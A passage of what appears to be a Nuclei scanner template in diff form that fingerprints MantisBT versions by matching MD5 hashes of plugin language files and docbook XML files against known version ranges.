name: 1.2.10 - 1.2.12 + dsl: + - "(\"2dff12cb856dad4cd04398a6df62da96\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"5b060af8b3a6aa8fd7f31c93ad250c54\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_catalan.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"8d6fbcadd407f6fb3a29c342773fe59b\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"49d22ca6bf353e088170b04c0cc42cee\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"a5674d61b8676435b01c56fc53885ad3\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"6c7c2cd920285641c073a273a1204335\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"8a6c0cac500b94d08b04b3987447dffd\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"ffc646e1ab382bbea14e1aec96f7f185\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"905a49aa6fe70e11789d8070f3c4c0b2\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"83f925cc813188dd541a5f6595a5e87e\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"3736647fe24b962d112e4af56056fdf8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_galician.txt" + + matchers: + - type: dsl + name: 2.5.0 - 2.24.3 + dsl: + - "(\"68b0fdb38374fe27ed8af8b262615dda\" == md5(body))" + - type: dsl + name: 2.4.0 - 2.4.2 + dsl: + - "(\"5f94e50b77376ced979a2c0d80357227\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.3.3 + dsl: + - "(\"ecfc5a483f9357976b1f89d2a4c07d37\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.11 + dsl: + - "(\"690e0c323d503a478da3848fc21da250\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"309d927b63e4785bc0e444c7cd64fff7\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"12eb578d687649c46b212644c1b9cca9\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"410b625752ff4217d7211af1fd6ddf3f\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"c6547db4e0e0c86a37eb33985e8cd74b\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"4556c80d55dcec09b17deafb0ad895db\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"1abd8a7764f727b9e8a1dc0cae3f7165\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_interlingua.txt" + + matchers: + - type: dsl + name: 1.3.5 - 2.24.3 + dsl: + - "(\"1489f41004fc428aff6172486664f19e\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.4 + dsl: + - "(\"1ed92690517d2085dd662aac34b18c55\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"2f5e8a00ac149936db4c854e6b6ecd55\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"d76f27cea9407df9318ac7c138adf547\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"16d154b1beebabb0cecefda0f1bd84dd\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"d1d6432b909a2f5a975304af4d24e623\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"f4629b1eb23286830a7645c5eb892dab\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"699393b817e53cd858e7bdbaaaa6bc98\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_qqq.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.24.3 + dsl: + - "(\"2350f71a56b86498b2a063eac3b2f008\" == md5(body))" + - type: dsl + name: 1.3.5 - 2.0.1 + dsl: + - "(\"0b11c45a04743dd0792b63c930e86fdb\" == md5(body))" + - type: dsl + name: 1.3.4 + dsl: + - "(\"a990e7de6eb0d597968eb8abdbefe090\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"b9ed6a06dba8336e167d44e816060030\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"fdbca1a82f6295d93f8972996c8b71ef\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"3147dd3194cec165876e9f6a7a1da4c0\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"b29e305d961dd60b2c14754abee9f5ed\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.4 + dsl: + - "(\"b5d4c0492486269b95030646a64399bc\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"6a149f488d32ea4dafc60a0dc6015ea8\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"71302646fdbcf605c36fc08dd516529d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_finnish.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.24.3 + dsl: + - "(\"70427f180e46c067a6df9812d503ebcd\" == md5(body))" + - type: dsl + name: 1.3.2 - 2.0.1 + dsl: + - "(\"eb70497630410d6374ee101b4dc5aa07\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"fd8f20b2702760b817476479c802b176\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"2a21ef9d464e45612a9dbb247b74d763\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"94a2621e0c64cd0cef8b7b6ec69bd377\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"3acd3d932544faf6908b68af1f7eb7c7\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"58768cfcda5f6b1ba95ea72209f9ccc4\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"9a550380d2d525196b5d3e2df593d133\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"28332a4bbccb6ebbeb6c83d8b5a974e7\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"2fc2a79d6a8bde831d5f1727b6533ca9\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"165f63081596cd9c15e62f2caacd45a1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_norwegian_nynorsk.txt" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"dcbf3dbdff72ebe055368ce1a3093ec9\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"8c8c6b4996adb77fc9a534540c178dee\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"1b90916472f0a43afb2d97c3887442f3\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"cb4620d53ece892624ed91eb2742685a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_urdu.txt" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"f586589e5d6c3fcb28d5fd21517c53a3\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"b37bf32e45dc082e857dc54485d69037\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"c5f0e4c44ca51067ffe2f76479738ff9\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"339b8aee583fec7546c7ed946135da3e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/filters.xml" + + matchers: + - type: dsl + name: 2.1.0 - 2.24.3 + dsl: + - "(\"46061571efdfb3c7543424fbc9ebf1ef\" == md5(body))" + - type: dsl + name: 1.3.1 - 2.0.1 + dsl: + - "(\"3129e10e5f2311920b1f5ffd388c7382\" == md5(body))" + - type: dsl + name: 1.3.0 + dsl: + - "(\"1017c5adb9460d054cdc62e1d733a242\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/Events.xml" + + matchers: + - type: dsl + name: 2.6.0 - 2.24.3 + dsl: + - "(\"ff76c7b6a40a7d2b11d393a7d7ab8ca5\" == md5(body))" + - type: dsl + name: 1.3.1 - 2.5.2 + dsl: + - "(\"a90a7cb94a85b640fd70149727fd1408\" == md5(body))" + - type: dsl + name: 1.3.0 + dsl: + - "(\"dae1bdc171c445d8f2e8eda0b6ba9c4b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/Events_Reference.xml" + + matchers: + - type: dsl + name: 2.4.0 - 2.24.3 + dsl: + - "(\"fd058ba54ac9a2c9056e109e3f7b8faf\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.3.3 + dsl: + - "(\"d7002f178e62efabf257cfa99cffc363\" == md5(body))" + - type: dsl + name: 1.3.1 - 2.2.4 + dsl: + - "(\"ce21a1d21b809c3f7d3013d063d4d733\" == md5(body))" + - type: dsl + name: 1.3.0 + dsl: + - "(\"14546badf7796fd86456af9dec5b2fc8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/status.xml" + + matchers: + - type: dsl + name: 2.4.0 - 2.7.1 + dsl: + - "(\"819b64c2b2ebfcbb5a9979dabd346c67\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.3.3 + dsl: + - "(\"3f95705a5c171445aa9f9b7b1be08214\" == md5(body))" + - type: dsl + name: 1.3.1 - 1.3.3 + dsl: + - "(\"7469fa9a20b23859c5e55a707688b071\" == md5(body))" + - type: dsl + name: 1.3.0 + dsl: + - "(\"fa7d2c348b6c251f04ea322a552bc338\" == md5(body))" + - type: dsl + name: 2.8.0 - 2.24.3 + dsl: + - "(\"355d8e97db1a104e5d346dbca0dc29ec\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_czech.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.8.1 + dsl: + - "(\"e336da6ea2f724b6322617ed5f9e3add\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"0c4364afddb00859b3d2e033efa4f959\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"f1c30214bc18ff8c62cc4b599925eb50\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"63649114e1d7690c9afec89cbca80f36\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"bfb407e44cd325a7bb7fd465975c6df4\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"b9e0db58378abd703b0d7c65eea31390\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"cf91ad0022e8320c4b3f11cc440cccae\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"3c8191dd1426e5490ded57aea3f49566\" == md5(body))" + - type: dsl + name: 2.9.0 - 2.24.3 + dsl: + - "(\"4abb7cf57bd10b36077ee9490be72ebb\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_korean.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.13.2 + dsl: + - "(\"1f98d7eb3ebd0b38a868e460585ef6eb\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"8451cff8839fa32df1013de1f1f4068a\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"bb0c1ca057e569387c59a820a5b2eb4d\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"a70401a97cb2f05199d9d0c03c062e1b\" == md5(body))" + - type: dsl + name: 2.14.0 - 2.18.1 + dsl: + - "(\"49ec6c6f282a90ada5fb760c9ba88404\" == md5(body))" + - type: dsl + name: 2.19.0 - 2.24.3 + dsl: + - "(\"f0807586ba41a109d532e600eb0e6432\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_portuguese_standard.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.10.1 + dsl: + - "(\"554067755a8a9c7fe0fdc82bf3d753f7\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"a5710670d27fceb7b65f685e577af976\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"6057c4c033556941265ac18d4dd5eabb\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"34267cb53b06791eacb79f4d58cd61ee\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"aa026ee373174912bbc357f6b06c14eb\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"d0ab514ab5bebe1912f113e12724561d\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"81b72c2ba849889b2f481bf3684ee3cf\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"c4295c3325c04daaf7665ec371899ad9\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"2c20d34d05adc7d209ea7604d21baa59\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"fd400410c1a7975c46a66098101c1094\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.21.3 + dsl: + - "(\"df8d164cbf78d43d0e764cd58a8d0c39\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"303c5417dd2d324fef2f740c49494393\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"e49160dcad34c7fd4381b5605fe69a50\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_ukrainian.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.21.3 + dsl: + - "(\"3d1ec2add80921bbec8ec8327b4d514f\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.5.2 + dsl: + - "(\"176dd88f763a101dd205ff1530aad72d\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"e80a53b654f7c0fc6dc14a5050400b8b\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"5436e9854e48246670039dada8c5a31a\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"df4dcccc362cc054dc240e6ceffd69c1\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"664b265ac707016e43286c1dc67e9763\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"d8f7ef7e7ac875030257ac5d79a2951b\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"4e24493444369ecf19cbcb7119f1ce2e\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"30cf7983b6faebadcc54e4df6b09ebdc\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"fefe4d7d3f990bb597b0d880c51e55a2\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_bulgarian.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.19.1 + dsl: + - "(\"2fc01cd077f69fb91b6b71d410394a6b\" == md5(body))" + - type: dsl + name: 2.4.0 - 2.5.2 + dsl: + - "(\"d2f15665d2ac6d14b661f0227051d830\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.3.3 + dsl: + - "(\"1f79b95e462d1fced258433dfc27c6fc\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"c9cc0eea0caf1afd43eb4725f2054007\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"9e4f93089385093697c79e9d132bfa51\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"36e75d6c97199b838b20546005a039f0\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"d5321698e703ba1ec5a159f2bd570101\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"abb0e7b567f82a04a3ac5c6018321352\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"aaa5b4ae72aab41811b7fe77587db4a4\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"a990aaedf1470af3f50fcf15089258b3\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"f662bffd8f57f45b20907b60cbba330f\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"6c9478728a0cd9a47c5f6a5de6c30291\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"7fc241e056f6d21fe4ca583363f65228\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"ff3839022de91762b10d9fbfdc3df3d3\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"4fd5c047a6db9d9f55b6d24a2d6dfb7f\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"56342cb837ab30c663b86ee52221fe38\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"2c5cdbcb6ce3d1b32a1a3f3bbb534f7b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_portuguese_brazil.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.19.1 + dsl: + - "(\"ca8910b5c809c2191c4900b371b6ed5a\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.5.2 + dsl: + - "(\"61e6a66f5fcef0342d71ece58b465353\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.2.4 + dsl: + - "(\"15c133752f82d3d1ecc9c0fa798e43eb\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"46488963b619ac6bacfba935fbbc616a\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"26fad0fced382be321b1a817d4e67598\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"9ba2fd5239445402b6f6bd6e296e93f1\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"f382749c3afcfe7505ff0a4ff8f8e2ae\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"ae6868e5ed144f61481a798fe571d061\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"86e65351447e73c87d320ab411c67516\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"66ff9b420c738bd859068686298ba72c\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"c3412da658c9ed8a5abba61819493bf6\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"dc840933f2b45a68a3b3a50dbbb357b0\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"2a10500ad642a1d7611fa90dfac0a283\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"84b4d2f3400134cfd72e40a6b672e854\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_spanish.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.18.1 + dsl: + - "(\"dbad7de0a4ef634c0bf43e4f4887433c\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.5.2 + dsl: + - "(\"db2db6bafd2974e6b8451131198e0fcc\" == md5(body))" + - type: dsl + name: 1.3.5 - 2.0.1 + dsl: + - "(\"cf6343e1ff9913b237d4cd1e6183b795\" == md5(body))" + - type: dsl + name: 1.3.4 + dsl: + - "(\"e16e8e9b8ee6915dee2e92c4c34e066f\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"69275b7a9c02bd673c468300c8463738\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"b66ad86127695f43816f4a00735dcea8\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"27d9e46f82cc3746b30845340431bd69\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"e94f6e3b6b34f47e97afcf87655eb29d\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"7bac3180dbb5fe5fdbff54f66c6e3dcb\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"006ad1d109958226b525ecd13e3dd32d\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"9c5813ea00e1fb1ec6dfe87a0fb35022\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"3e007ab34b7966eb99fed4893b0acf13\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"6749629694747f91ee845ddf6f42231b\" == md5(body))" + - type: dsl + name: 2.19.0 - 2.19.1 + dsl: + - "(\"77198aadf16ff6f2c9677523f7fc75ff\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"80b45913b96866d183f96fdc83314917\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"8f7a791993ea8a4416308f64e0ec24d2\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_ukrainian.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.22.2 + dsl: + - "(\"dd39e189f4c91e83d7fd9259836fe97a\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"e7f35f45e741c1ba8f97d3e84c50bd9d\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"81f3b765bcbec6a340f2d319c117fff3\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"75d749bfc01bb090767f5e275fdb29ad\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_hebrew.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.22.2 + dsl: + - "(\"e8d468861f3c43d58a62a008cda4b0b2\" == md5(body))" + - type: dsl + name: 1.3.2 - 2.0.1 + dsl: + - "(\"745c346936f2c9b8d4a9af5b1d777d2f\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"476e0396cbf6ec0aba0f4d866512c927\" == md5(body))" + - type: dsl + name: 1.2.9 + dsl: + - "(\"b859f529a9788ca515fa305d669c8b12\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"ce9b6e66e4cfd0b0582d9d57c48065dc\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"a10d7f596a0241ec623998959100fc3b\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"561c5ea46e5c2941445a29cfa85ce763\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"4f6f647c5272da6e2190626ae726d611\" == md5(body))" + - type: dsl + name: 1.2.10 - 1.2.12 + dsl: + - "(\"32053d456d5dbf96b8086dcbd63e4e54\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"a82514ba731a2db5188e78c768e9aaad\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"26c2ceb19ada5673640d5f47a028335b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_lithuanian.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.22.2 + dsl: + - "(\"b6ba6a71fe0bbc9d1d207e22bdf1fd4a\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.5.2 + dsl: + - "(\"9baee5efa06a891e79dc8d25a768501c\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"5ecc272bf125306b4d508fffb94e22dc\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"af4f75db882301434402c66ce1686b40\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"63764d842f8306f180f91220d1e9f083\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"c71f8f2c247e3411762fce8ba90550f8\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"f14d13312571a108b4d92ecba72295bb\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"160ffcc4f9d3eae1dc06789b1f6c8531\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"22c788e9cab47f3c1ea510f6429959af\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"6393f1e3a4bd88076e8532f13fd6da5d\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"1de21ab1ee9eb136eab794d23ea92f40\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"cc068b8330f3ddecbaccf9a0ff7e19a3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_galician.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.22.2 + dsl: + - "(\"7480e991289ee873ecfdbc2158c655db\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.5.2 + dsl: + - "(\"d1f07190cb4778008b15913b2548ac17\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"ca1ab64d21d9a692216442055640a12b\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"a4e64d8232bc462044179f3c540f91be\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"530bbcdc763107a65b7d8094c0f7aa41\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"6bc1d82b3f64071902ab249e45b63d67\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.11 + dsl: + - "(\"a5c663e6b15f6fd1431a5f7d1c84235f\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"b962a73720c30060c678147507c75af1\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"6fccbe829b864d6493d5d375ab6211f6\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"b8cc63f38f90339bb7df71b55f80af9e\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"8519e22a726a7741d209ba8027295119\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"644c5976e51ee4486c94e1ccc83ddae7\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"5222415f9fc5fa9643ca35c5e9dd9b16\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"0cba7f1b5d12289e8a17e0cfbff15cc5\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_dutch.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.12.2 + dsl: + - "(\"ccefcbd6bf5fc90b51e23c33410f2e8c\" == md5(body))" + - type: dsl + name: 1.3.2 - 2.0.1 + dsl: + - "(\"c540e287f011ce06a41da9701bed0290\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"72473c394f4bc2656608149b2f91661b\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.11 + dsl: + - "(\"275144b2d5c3df15f50c0e1f7255b7f3\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"41682bf085d5aa9332ac84d3febb8c1c\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"63dede4ef85a800e7526cd42b1a6d671\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"d4e54825fab2a13e6fe49f93f507b144\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"956d7eea9fc92f9c025589481927a997\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"c7bb845d27c83f4617a36459f01f3e18\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"ef79baf68be230f7636706b678936e4b\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.22.2 + dsl: + - "(\"311f523cbc1019ede7b17767b2d1fe39\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - 